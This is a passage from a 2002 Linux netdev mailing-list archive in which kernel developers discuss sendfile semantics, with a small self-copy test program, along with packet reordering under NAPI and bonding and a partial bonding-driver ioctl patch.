2002 15:58:47 -0700 (PDT) Received: from passion.cambridge.redhat.com (dell-paw-3.cambridge.redhat.com [195.224.55.237]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GMwitG024266 for ; Mon, 16 Sep 2002 15:58:45 -0700 Received: from dwmw2 (helo=redhat.com) by passion.cambridge.redhat.com with local-esmtp (Exim 3.35 #5) id 17r4tj-0003CI-00; Tue, 17 Sep 2002 00:03:19 +0100 X-Mailer: exmh version 2.5 13/07/2001 with nmh-1.0.4 From: David Woodhouse X-Accept-Language: en_GB In-Reply-To: <20020916.154640.78359545.davem@redhat.com> References: <20020916.154640.78359545.davem@redhat.com> <20020916.125211.82482173.davem@redhat.com> <12116.1032216780@redhat.com> To: "David S. 
Miller" Cc: linux-kernel@vger.kernel.org, todd-lkml@osogrande.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 17 Sep 2002 00:03:19 +0100 Message-ID: <12293.1032217399@redhat.com> X-archive-position: 208 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: dwmw2@infradead.org Precedence: bulk X-list: netdev davem@redhat.com said: > > Er, surely the same goes for sys_sendfile? Why have a new system > > call rather than just swapping the 'in' and 'out' fds? > There is an assumption that one is a linear stream of output (in this > case a socket) and the other one is a page cache based file. That's an implementation detail and it's not clear we should be exposing it to the user. It's not entirely insane to contemplate socket->socket or file->file sendfile either -- would we invent new system calls for those too? File descriptors are file descriptors. > It would be nice to extend sys_sendfile to work properly in both ways > in a manner that Linus would accept, want to work on that? Yeah -- I'll add it to the TODO list. Scheduled for some time in 2007 :) More seriously though, I'd hope that whoever implemented what you call 'sys_receivefile' would solve this issue, as 'sys_receivefile' isn't really useful as anything more than a handy nomenclature for describing the process in question. 
-- dwmw2 From jgarzik@mandrakesoft.com Mon Sep 16 16:03:54 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 16:03:55 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GN3qtG025081 for ; Mon, 16 Sep 2002 16:03:53 -0700 Received: from c-24-98-61-134.atl.client2.attbi.com ([24.98.61.134] helo=mandrakesoft.com) by www.linux.org.uk with esmtp (Exim 3.33 #5) id 17r4z0-0007yQ-00; Tue, 17 Sep 2002 00:08:47 +0100 Message-ID: <3D86645F.5030401@mandrakesoft.com> Date: Mon, 16 Sep 2002 19:08:15 -0400 From: Jeff Garzik Organization: MandrakeSoft User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: David Woodhouse CC: "David S. Miller" , linux-kernel@vger.kernel.org, todd-lkml@osogrande.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <20020916.154640.78359545.davem@redhat.com> <20020916.125211.82482173.davem@redhat.com> <12116.1032216780@redhat.com> <12293.1032217399@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 209 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@mandrakesoft.com Precedence: bulk X-list: netdev David Woodhouse wrote: > davem@redhat.com said: > >>> Er, surely the same goes for sys_sendfile? Why have a new system >>> call rather than just swapping the 'in' and 'out' fds? >> > >>There is an assumption that one is a linear stream of output (in this >>case a socket) and the other one is a page cache based file. > > > That's an implementation detail and it's not clear we should be exposing it > to the user. 
It's not entirely insane to contemplate socket->socket or > file->file sendfile either -- would we invent new system calls for those > too? File descriptors are file descriptors. I was rather disappointed when file->file sendfile was [purposefully?] broken in 2.5.x... Jeff From davem@redhat.com Mon Sep 16 16:06:19 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 16:06:21 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GN6ItG026042 for ; Mon, 16 Sep 2002 16:06:18 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id QAA10340; Mon, 16 Sep 2002 16:02:11 -0700 Date: Mon, 16 Sep 2002 16:02:10 -0700 (PDT) Message-Id: <20020916.160210.70782700.davem@redhat.com> To: jgarzik@mandrakesoft.com Cc: dwmw2@infradead.org, linux-kernel@vger.kernel.org, todd-lkml@osogrande.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <3D86645F.5030401@mandrakesoft.com> References: <12116.1032216780@redhat.com> <12293.1032217399@redhat.com> <3D86645F.5030401@mandrakesoft.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 210 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Jeff Garzik Date: Mon, 16 Sep 2002 19:08:15 -0400 I was rather disappointed when file->file sendfile was [purposefully?] broken in 2.5.x... What change made this happen? 
From jgarzik@mandrakesoft.com Mon Sep 16 16:44:16 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 16:44:17 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GNiEtG027682 for ; Mon, 16 Sep 2002 16:44:15 -0700 Received: from c-24-98-61-134.atl.client2.attbi.com ([24.98.61.134] helo=mandrakesoft.com) by www.linux.org.uk with esmtp (Exim 3.33 #5) id 17r5c6-0000CN-00; Tue, 17 Sep 2002 00:49:10 +0100 Message-ID: <3D866DD5.4080207@mandrakesoft.com> Date: Mon, 16 Sep 2002 19:48:37 -0400 From: Jeff Garzik Organization: MandrakeSoft User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: dwmw2@infradead.org, linux-kernel@vger.kernel.org, todd-lkml@osogrande.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <12116.1032216780@redhat.com> <12293.1032217399@redhat.com> <3D86645F.5030401@mandrakesoft.com> <20020916.160210.70782700.davem@redhat.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 211 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@mandrakesoft.com Precedence: bulk X-list: netdev David S. Miller wrote: > From: Jeff Garzik > Date: Mon, 16 Sep 2002 19:08:15 -0400 > > I was rather disappointed when file->file sendfile was [purposefully?] > broken in 2.5.x... > > What change made this happen? I dunno when it happened, but 2.5.x now returns EINVAL for all file->file cases. In 2.4.x, if sendpage is NULL, file_send_actor in mm/filemap.c faked a call to fops->write(). In 2.5.x, if sendpage is NULL, EINVAL is unconditionally returned. 
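For callers that cannot rely on file->file sendfile working on a given kernel, the behaviour Jeff describes above (EINVAL when the destination has no sendpage) can be handled in user space. What follows is only a minimal sketch, not anything posted in the thread: `copy_fd` and `write_all` are hypothetical helper names, and the fallback assumes a plain read()/write() loop is acceptable when sendfile() refuses the descriptor pair.

```c
#include <assert.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: write all len bytes, retrying on short writes and EINTR. */
static int write_all(int fd, const char *buf, size_t len)
{
    while (len > 0) {
        ssize_t w = write(fd, buf, len);
        if (w < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        buf += w;
        len -= (size_t)w;
    }
    return 0;
}

/*
 * Hypothetical helper: copy up to len bytes from in_fd (at its current
 * offset) to out_fd. Tries sendfile() first; if the kernel rejects the
 * descriptor pair with EINVAL or ENOSYS, switches to read()/write().
 * Returns the number of bytes copied (short on EOF), or -1 on error.
 */
static ssize_t copy_fd(int out_fd, int in_fd, size_t len)
{
    char buf[4096];
    size_t done = 0;
    int use_sendfile = 1;

    assert(out_fd >= 0 && in_fd >= 0);

    while (done < len) {
        ssize_t n;

        if (use_sendfile) {
            n = sendfile(out_fd, in_fd, NULL, len - done);
            if (n < 0 && (errno == EINVAL || errno == ENOSYS)) {
                use_sendfile = 0;   /* this fd pair is not supported */
                continue;
            }
        } else {
            size_t want = len - done;
            if (want > sizeof(buf))
                want = sizeof(buf);
            n = read(in_fd, buf, want);
            if (n > 0 && write_all(out_fd, buf, (size_t)n) < 0)
                return -1;
        }
        if (n < 0) {
            if (errno == EINTR)
                continue;
            return -1;
        }
        if (n == 0)
            break;                  /* EOF on the source */
        done += (size_t)n;
    }
    return (ssize_t)done;
}
```

A caller would open both files, call `copy_fd(out, in, st.st_size)` and compare the return value with the requested length. The fallback costs an extra copy through user space, which is exactly what sendfile is meant to avoid, so it only makes sense as a compatibility path.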
From davem@redhat.com Mon Sep 16 16:47:59 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 16:48:01 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GNlxtG028046 for ; Mon, 16 Sep 2002 16:47:59 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id QAA10633; Mon, 16 Sep 2002 16:43:44 -0700 Date: Mon, 16 Sep 2002 16:43:43 -0700 (PDT) Message-Id: <20020916.164343.128145825.davem@redhat.com> To: jgarzik@mandrakesoft.com Cc: dwmw2@infradead.org, linux-kernel@vger.kernel.org, todd-lkml@osogrande.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <3D866DD5.4080207@mandrakesoft.com> References: <3D86645F.5030401@mandrakesoft.com> <20020916.160210.70782700.davem@redhat.com> <3D866DD5.4080207@mandrakesoft.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 212 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Jeff Garzik Date: Mon, 16 Sep 2002 19:48:37 -0400 I dunno when it happened, but 2.5.x now returns EINVAL for all file->file cases. In 2.4.x, if sendpage is NULL, file_send_actor in mm/filemap.c faked a call to fops->write(). In 2.5.x, if sendpage is NULL, EINVAL is unconditionally returned. What if source and destination file and offsets match? Sounds like 2.4.x might deadlock. In fact it sounds similar to the "read() with buf pointed to same page in MAP_WRITE mmap()'d area" deadlock we had ages ago. 
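The case raised above (source and destination being the same file at the same offsets) can at least be detected from user space before the copy is attempted. The sketch below is illustrative only and is not from the thread: `same_file` and `ranges_overlap` are hypothetical names, and it assumes that comparing st_dev and st_ino is a sufficient identity test for the files involved.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Hypothetical helper: returns 1 if both descriptors refer to the same
 * inode on the same device, 0 if they do not, -1 if fstat() fails.
 */
static int same_file(int fd_a, int fd_b)
{
    struct stat a, b;

    if (fstat(fd_a, &a) < 0 || fstat(fd_b, &b) < 0)
        return -1;
    return a.st_dev == b.st_dev && a.st_ino == b.st_ino;
}

/*
 * Hypothetical helper: returns 1 if [src_off, src_off + len) and
 * [dst_off, dst_off + len) share at least one byte, 0 otherwise.
 */
static int ranges_overlap(off_t src_off, off_t dst_off, size_t len)
{
    off_t n = (off_t)len;

    return n > 0 && src_off < dst_off + n && dst_off < src_off + n;
}
```

A cautious caller could refuse, or take a slower buffered path, when `same_file(out, in) == 1` and `ranges_overlap(...)` is true. This says nothing about whether a given kernel would actually deadlock; it only identifies the aliasing situation being asked about.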
From jgarzik@mandrakesoft.com Mon Sep 16 16:57:02 2002 Received: with ECARTIS (v1.0.0; list netdev); Mon, 16 Sep 2002 16:57:05 -0700 (PDT) Received: from www.linux.org.uk (parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8GNv1tG028487 for ; Mon, 16 Sep 2002 16:57:02 -0700 Received: from c-24-98-61-134.atl.client2.attbi.com ([24.98.61.134] helo=mandrakesoft.com) by www.linux.org.uk with esmtp (Exim 3.33 #5) id 17r5oS-0000QV-00; Tue, 17 Sep 2002 01:01:56 +0100 Message-ID: <3D8670D4.9040801@mandrakesoft.com> Date: Mon, 16 Sep 2002 20:01:24 -0400 From: Jeff Garzik Organization: MandrakeSoft User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1) Gecko/20020826 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "David S. Miller" CC: dwmw2@infradead.org, linux-kernel@vger.kernel.org, todd-lkml@osogrande.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, netdev@oss.sgi.com, pfeather@cs.unm.edu Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <3D86645F.5030401@mandrakesoft.com> <20020916.160210.70782700.davem@redhat.com> <3D866DD5.4080207@mandrakesoft.com> <20020916.164343.128145825.davem@redhat.com> Content-Type: multipart/mixed; boundary="------------060600040500080402020405" X-archive-position: 213 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jgarzik@mandrakesoft.com Precedence: bulk X-list: netdev This is a multi-part message in MIME format. --------------060600040500080402020405 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit David S. Miller wrote: > From: Jeff Garzik > Date: Mon, 16 Sep 2002 19:48:37 -0400 > > I dunno when it happened, but 2.5.x now returns EINVAL for all > file->file cases. > > In 2.4.x, if sendpage is NULL, file_send_actor in mm/filemap.c faked a > call to fops->write(). > In 2.5.x, if sendpage is NULL, EINVAL is unconditionally returned. 
> > > What if source and destination file and offsets match? The same data is written out. No deadlock. (unless the attached test is wrong) Jeff --------------060600040500080402020405 Content-Type: text/plain; name="sendfile-test-2.c" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="sendfile-test-2.c"

#include <sys/types.h>
#include <sys/stat.h>
#include <sys/sendfile.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdio.h>

int main (int argc, char *argv[])
{
	int in, out;
	struct stat st;
	off_t off = 0;
	ssize_t rc;

	/* open the same file twice: once as source, once as destination */
	in = open("test.data", O_RDONLY);
	if (in < 0) {
		perror("test.data read");
		return 1;
	}

	if (fstat(in, &st) < 0) {
		perror("test.data fstat");
		close(in);
		return 1;
	}

	out = open("test.data", O_WRONLY);
	if (out < 0) {
		perror("test.data write");
		close(in);
		return 1;
	}

	/* source and destination file and offsets match */
	rc = sendfile(out, in, &off, st.st_size);
	if (rc < 0) {
		perror("sendfile");
		close(in);
		close(out);
		return 1;
	}

	close(in);
	close(out);
	return 0;
}

--------------060600040500080402020405-- From hadi@cyberus.ca Tue Sep 17 03:19:07 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 03:19:10 -0700 (PDT) Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HAJ6tG010108 for ; Tue, 17 Sep 2002 03:19:06 -0700 Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.)
with ESMTP id GAA12849; Tue, 17 Sep 2002 06:23:59 -0400 (EDT) Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g8HAGpM01475; Tue, 17 Sep 2002 06:16:59 -0400 (EDT) X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs Date: Tue, 17 Sep 2002 06:16:51 -0400 (EDT) From: jamal To: Ben Greear cc: Chris Friesen , Cacophonix , , Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation In-Reply-To: <3D860246.3060609@candelatech.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 214 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev On Mon, 16 Sep 2002, Ben Greear wrote: > Also, I notice lots of out-of-order packets on a single gigE link when running at high > speeds (SMP machine), so the kernel is still having to reorder quite a few packets. > Has anyone done any tests to see how much worse it is with dual-port bonding? It will depend on the scheduling algorithm used. Always remember that reordering is BAD for TCP and you shall be fine. Typically, for TCP you want to run a single flow onto a single NIC. If you are running some UDP type control app in a cluster environment where ordering is a non-issue then you could maximize throughput by sending as fast as you can on all interfaces. > > NAPI helps my problem, but does not make it go away entirely. > Could you be more specific as to where you see reordering with NAPI? Please don't disappear. What is it that you see that makes you believe there's reordering with NAPI? I.e., describe your test setup etc.
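The "single flow onto a single NIC" rule above is usually implemented by hashing the flow identifiers to pick an interface, so that every packet of one TCP connection leaves in order on the same link. The sketch below only illustrates that idea. It is not the bonding driver's algorithm: `struct flow` and `pick_slave` are hypothetical names, and the XOR-fold hash is an arbitrary choice.

```c
#include <assert.h>
#include <stdint.h>

/* Hypothetical flow key: IPv4 addresses and transport ports. */
struct flow {
    uint32_t saddr, daddr;
    uint16_t sport, dport;
};

/*
 * Hypothetical helper: map a flow to one of n_slaves interfaces.
 * The same flow always maps to the same index, so its packets are
 * never spread across links and cannot be reordered by the bond.
 */
static unsigned pick_slave(const struct flow *f, unsigned n_slaves)
{
    uint32_t h;

    assert(n_slaves > 0);

    h = f->saddr ^ f->daddr ^ (((uint32_t)f->sport << 16) | f->dport);
    h ^= h >> 16;   /* fold the high bits down */
    h ^= h >> 8;
    return h % n_slaves;
}
```

The trade-off is the one described above: a single flow can never exceed the speed of one link, whereas round-robin across all links maximizes throughput only where ordering does not matter.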
cheers, jamal From hadi@cyberus.ca Tue Sep 17 03:33:14 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 03:33:16 -0700 (PDT) Received: from cyberus.ca (mail.cyberus.ca [216.191.240.111]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HAXDtG011357 for ; Tue, 17 Sep 2002 03:33:14 -0700 Received: from shell.cyberus.ca (shell [216.191.240.114]) by cyberus.ca (8.9.3/8.9.3/Cyberus Online Inc.) with ESMTP id GAA15143; Tue, 17 Sep 2002 06:38:04 -0400 (EDT) Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g8HAV3M01501; Tue, 17 Sep 2002 06:31:03 -0400 (EDT) X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs Date: Tue, 17 Sep 2002 06:31:03 -0400 (EDT) From: jamal To: "David S. Miller" cc: , , , , Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <20020916.125211.82482173.davem@redhat.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 215 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev On Mon, 16 Sep 2002, David S. Miller wrote: > From: todd-lkml@osogrande.com > Date: Mon, 16 Sep 2002 08:16:47 -0600 (MDT) > > are there any standards in progress to support this. > > Your question makes no sense, it is a hardware optimization > of an existing standard. The chip merely is told what flows > exist and it concatenates TCP data from consequetive packets > for that flow if they arrive in sequence. > Hrm. Again, the big Q: How "thmart" is this NIC going to be (think congestion control and the du-jour flavor). 
cheers, jamal From greearb@candelatech.com Tue Sep 17 09:39:15 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 09:39:19 -0700 (PDT) Received: from grok.yi.org (IDENT:fDHp/qQcEe1K1Ccsdpw2mF+SLuhUsKl6@dhcp101-dsl-usw4.w-link.net [208.161.125.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HGdCtG008750 for ; Tue, 17 Sep 2002 09:39:14 -0700 Received: from candelatech.com (IDENT:MO0wnSoFaBCJUhQEQ+qgZipsOkBZvwQM@localhost.localdomain [127.0.0.1]) by grok.yi.org (8.11.6/8.11.2) with ESMTP id g8HGhLv14389; Tue, 17 Sep 2002 09:43:22 -0700 Message-ID: <3D875BA9.70501@candelatech.com> Date: Tue, 17 Sep 2002 09:43:21 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.1b) Gecko/20020722 X-Accept-Language: en-us, en MIME-Version: 1.0 To: jamal CC: Chris Friesen , Cacophonix , linux-net@vger.kernel.org, netdev@oss.sgi.com Subject: Re: bonding vs 802.3ad/Cisco EtherChannel link agregation References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 216 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev jamal wrote: > > On Mon, 16 Sep 2002, Ben Greear wrote: > > >>Also, I notice lots of out-of-order packets on a single gigE link when running at high >>speeds (SMP machine), so the kernel is still having to reorder quite a few packets. >>Has anyone done any tests to see how much worse it is with dual-port bonding? > > > It will depend on the scheduling algorithm used. > Always remember that reordering is BAD for TCP and you shall be fine. > Typical for TCP you want to run a single flow onto a single NIC. > If you are running some UDP type control app in a cluster environment > where ordering is a non-issue then you could maximize throughput > by sending as fast as you can on all interfaces. 
> > >>NAPI helps my problem, but does not make it go away entirely. >> > > > Could you be more specific as to where you see reordering with NAPI? > Please don't disappear. What is it that you see that makes you believe > there's reordering with NAPI? I.e., describe your test setup etc. I have a program that sends and receives UDP packets with 32-bit sequence numbers. I can detect OOO packets if they fit into the last 10 packets received. If they are farther out of order than that, the code treats them as dropped.... I used smp_affinity to tie a NIC to a CPU, and the NAPI patch for 2.4.20-pre7. When sending and receiving 250Mbps of UDP/IP traffic (sending over cross-over cable to other NIC on same machine), I see the occasional OOO packet. I also see bogus dropped packets, which means sometimes the order is off by 10 or more packets.... The other fun thing about this setup is that after running around 65 billion bytes with this test, the machine crashes with an oops. I can repeat this at will, but so far only on this dual-proc machine, and only using the e1000 driver (NAPI or regular). Soon, I'll test with a 4-port tulip NIC to see if I can take the e1000 out of the equation... I can also repeat this at slower speeds (50Mbps send & receive), and using the pktgen tool. If anyone else is running high sustained SEND & RECEIVE traffic, I would be interested to know their stability!
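The detection scheme described above (32-bit sequence numbers, late packets counted as out of order only if they fall within the last 10, otherwise left as dropped) can be sketched roughly as follows. This is an assumption about how such a counter might work, not the actual test program: `struct seq_tracker` and `seq_tracker_rx` are hypothetical names, the window is measured in sequence-number distance, and duplicates are not distinguished from late packets.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define OOO_WINDOW 10   /* how far behind a late packet may be */

/* Hypothetical per-stream counters. */
struct seq_tracker {
    uint32_t next;      /* next sequence number expected */
    uint64_t received;  /* packets seen */
    uint64_t ooo;       /* late packets that arrived within the window */
    uint64_t dropped;   /* sequence numbers skipped and never recovered */
    int started;
};

static void seq_tracker_rx(struct seq_tracker *t, uint32_t seq)
{
    int32_t delta;

    t->received++;
    if (!t->started) {
        t->started = 1;
        t->next = seq + 1;
        return;
    }

    /* signed distance from the expected number; safe across wraparound */
    delta = (int32_t)(seq - t->next);
    if (delta >= 0) {
        /* skipped numbers are presumed lost until they show up */
        t->dropped += (uint32_t)delta;
        t->next = seq + 1;
    } else if (delta >= -OOO_WINDOW) {
        /* late but inside the window: reclassify as out of order */
        t->ooo++;
        if (t->dropped > 0)
            t->dropped--;
    }
    /* else: too late to match up, so it stays counted as dropped */
}
```

With this accounting, a packet that arrives more than 10 behind is still reported as a drop even though it was received, which matches the "bogus dropped packets" symptom described above.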
I have had a single-proc machine running the exact same (SMP) kernel as the dual-proc machine, but using the tulip driver, and it has run solid for 2 days, sending & receiving over 1.3 trillion bytes :) Thanks, Ben > > cheers, > jamal > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From tony.cureington@hp.com Tue Sep 17 12:23:58 2002 Received: with ECARTIS (v1.0.0; list netdev); Tue, 17 Sep 2002 12:24:05 -0700 (PDT) Received: from zcamail04.zca.compaq.com (zcamail04.zca.compaq.com [161.114.32.104]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8HJNwtG018081 for ; Tue, 17 Sep 2002 12:23:58 -0700 Received: from cacexg11.americas.cpqcorp.net (cacexg11.americas.cpqcorp.net [16.105.250.94]) by zcamail04.zca.compaq.com (Postfix) with ESMTP id 99BE524BB; Tue, 17 Sep 2002 12:28:53 -0700 (PDT) Received: from txnexc01.americas.cpqcorp.net ([16.74.7.244]) by cacexg11.americas.cpqcorp.net with Microsoft SMTPSVC(5.0.2195.2966); Tue, 17 Sep 2002 12:28:53 -0700 X-MimeOLE: Produced By Microsoft Exchange V6.0.6249.0 content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Subject: RE: [Bonding-devel] Re: Bonding driver unreliable under high CPU load Date: Tue, 17 Sep 2002 14:28:52 -0500 Message-ID: <72A87F7160C0994D8C5A36E2FDC227F502B3E70D@txnexc01.americas.cpqcorp.net> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: [Bonding-devel] Re: Bonding driver unreliable under high CPU load Thread-Index: AcJcZbqPiL/rs1EGQVSwvbWe/BplIgCDI5pQ From: "Cureington, Tony" To: "Andrew Morton" , "Pascal Brisset" Cc: , X-OriginalArrivalTime: 17 Sep 2002 19:28:53.0361 (UTC) FILETIME=[751F5E10:01C25E80] Content-Transfer-Encoding: 8bit X-MIME-Autoconverted: from quoted-printable to 8bit by oss.sgi.com id g8HJNwtG018081 X-archive-position: 217 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com 
X-original-sender: tony.cureington@hp.com Precedence: bulk X-list: netdev I've been running some similar code (on 2.4.18) that makes the ioctl a macro - we must handle the MII ioctls too. The patch below also corrects the mii pointer being assigned the address of a pointer (&ifr.ifr_data, ifr_data is a macro that produces a pointer) instead of the pointer itself. The patch: --- linux-2.4.20-pre7/drivers/net/bonding.c Tue Sep 17 09:54:35 2002 +++ linux-2.4.20-pre7_mod/drivers/net/bonding.c Tue Sep 17 11:18:28 2002 @@ -316,6 +316,28 @@ #define IS_UP(dev) ((((dev)->flags & (IFF_UP)) == (IFF_UP)) && \ (netif_running(dev) && netif_carrier_ok(dev))) +/* this IOCTL macro is used to prevent network drivers from returning -EFAULT + * from the ioctl, returning -EFAULT causes a link up status to be returned + * from bond_check_dev_link even when the link is even connected. this macro + * allows the get_user/copy_from_user in network drivers ioctls to work without + * intermittently returning -EFAULT. this turns off argument validity + * checking on the address passed to the network driver ioctl. + * + * this method of turning off argument validity checking is also used in the + * following drivers: + * /usr/src/linux/drivers/addon/iscsi/; addon/cpip; net/hamradio; + * net/wan; sound/; + * + * ioctl must be set to dev->do_ioctl before this macro + */ +#define IOCTL(dev, arg, cmd) ({ \ + int ret; \ + mm_segment_t fs = get_fs(); \ + set_fs(get_ds()); \ + ret = ioctl(dev, arg, cmd); \ + set_fs(fs); \ + ret; }) + static void bond_restore_slave_flags(slave_t *slave) { slave->dev->flags = slave->original_flags; @@ -416,7 +438,7 @@ /* effect... 
